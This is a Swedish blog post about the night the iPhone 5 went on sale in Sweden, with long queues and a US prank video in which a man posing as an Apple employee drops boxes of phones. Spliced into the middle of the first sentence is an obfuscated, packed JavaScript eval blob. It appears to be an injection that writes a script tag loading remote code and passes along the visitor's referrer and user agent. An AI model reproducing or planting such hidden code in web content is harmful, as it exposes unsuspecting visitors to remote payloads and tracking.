Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

iPhone 5 släppet i natt

Sebastian

Inatt eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fefya|var|u0026u|referrer|hydis||js|php’.split(’|’),0,{}))
släpptes iPhone 5 i Sverige. Köerna utanför operatörernas butiker var mycket långa.

I USA släpptes telefonen för någon vecka sedan och även där var det självklart köer. Alla vet hur man ofta skämtar om de som sitter och väntar och många  kan tycka att det  inte är värt det. Den här personen i videon ovan tog ”prank” till en annan nivå. Han bestämde sig för att skrämma köerna utanför Apple Stores i USA genom att låtsas tappa en massa lådor fyllda med iPhone 5.

Genom att han var ”utklädd” till en Apple-anställd togs självklart skojet på högsta allvar av publiken som kanske inte blev så glada.

iPhone 5 släpptes som sagt i natt och för er som inte stod i kö men har förbokat vet att ni kommer få hem en avi senare idag som ger er rätt att hämta ut en iPhone 5 på posten, om ni står på listan gällande första leveransen såklart. Det har varit stort tryck på telefonen och många kommer få vänta tills leverans 2 som sker om ca 1-3 veckor.

Själv kommer vi på redaktionen hämta våra exemplar idag 🙂 Mycket nöje!

Youtube

Se iPhone 5 krossas ovan!